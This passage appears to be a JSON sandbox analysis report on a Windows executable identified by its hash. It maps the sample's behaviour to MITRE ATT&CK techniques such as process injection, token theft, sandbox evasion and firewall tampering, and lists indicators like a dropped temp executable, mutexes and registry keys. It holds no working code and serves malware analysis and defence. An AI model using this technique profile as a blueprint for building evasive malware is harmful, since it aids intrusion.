"https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hdvvshgu.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" touched \"Sticky Notes Namespace Extension for Windows 